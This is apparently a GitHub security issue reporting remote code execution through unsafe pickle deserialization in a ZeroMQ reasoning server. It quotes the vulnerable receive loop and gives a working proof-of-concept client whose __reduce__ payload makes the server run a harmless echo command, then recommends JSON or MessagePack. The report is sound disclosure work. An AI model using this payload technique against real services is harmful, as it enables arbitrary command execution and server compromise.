Security Report: Remote Code Execution Vulnerability in experiments.robot.bridge.reasoning_server::run_reasoning_server #18
Description
Summary
A critical Remote Code Execution (RCE) vulnerability exists in experiments.robot.bridge.reasoning_server::run_reasoning_server. The server accepts incoming messages and deserializes them using pickle.loads, which allows attackers to execute arbitrary code on the host system.
Details
The vulnerable code is located at:experiments.robot.bridge.reasoning_server::run_reasoning_server
The server listens for incoming messages via ZeroMQ (zmq). Received data is deserialized using pickle.loads(message):
while True:
message = socket.recv()
inputs = pickle.loads(message) # Unsafe deserialization
result = model.raw_generate(*inputs)
socket.send(pickle.dumps(result))pickle is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization.
Proof of Concept (PoC)
- Start the vulnerable server:
PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
- Run the following client code to send a malicious payload:
import pickle, zmq class Payload(object): def __reduce__(self): import os return (os.system, ('echo "hacked"',)) context = zmq.Context() socket = context.socket(zmq.REQ) socket.connect("tcp://127.0.0.1:5623") socket.send(pickle.dumps(Payload()))
- The server will execute
os.system('echo "hacked"'), demonstrating remote code execution.
Impact
- Attackers can remotely execute arbitrary system commands, leading to full server compromise.
- This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure.
Recommendation
- Never use
pickle.loadson data from untrusted sources. - Replace
picklewith a safe serialization format such as JSON or MessagePack, and strictly validate all inputs.